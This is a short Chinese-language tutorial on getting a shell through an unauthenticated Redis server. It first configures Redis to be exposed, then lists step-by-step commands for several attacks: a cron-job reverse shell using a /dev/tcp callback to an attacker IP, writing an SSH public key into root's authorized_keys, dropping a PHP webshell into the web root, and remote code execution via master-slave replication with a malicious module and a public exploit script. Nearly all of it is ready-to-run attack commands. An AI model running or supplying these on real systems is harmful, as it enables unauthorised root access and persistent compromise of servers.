Redis GetShell方法
一、环境搭建
下载:wget http://download.redis.io/releases/redis-4.0.9.tar.gz
解压:tar -zxvf redis-4.0.9.tar.gz
cd redis-4.0.9
make
make test
make install
依次执行
配置redis.conf
注释 bind 127.0.0.1
关闭保护模式,将protected-mode yes改为no
二、未授权连接
redis-cli -h IP地址 -p 6379
测试语句 info
三、计划任务获取shell
本机监听 nc -lvvp 4444
redis执行
set x "\n * bash -i >& /dev/tcp/192.168.239.136/8888 0>&1\n"
config set dir /var/spool/cron/
config set dbfilename root
save
四、SSH-Keygen
本地生产密钥
cd .ssh
ssh-keygen -t rsa
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt
cat foo.txt | redis-cli -h 192.168.239.129 -x set crackit
Redis
redis-cli -h 192.168.239.129
config set dir /root/.ssh/
config get dir
config set dbfilename "authorized_keys"
save
最后本机运行
ssh -i id_rsa root@x.x.x.x
五、写入Webshell
redis-cli -h 192.168.239.129
config set dir /var/www/html/
config set dbfilename shell.php
set x "<?php phpinfo();?>"
save
六、利用主从复制RCE
so文件:git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand(下载后进入目录make,获取恶意so文件)
python脚本:git clone https://github.com/Ridter/redis-rce.git
执行命令:python3 redis-rce.py -r 192.168.239.129 -p 6379 -L 192.168.239.136 -f module.so
评论 (0)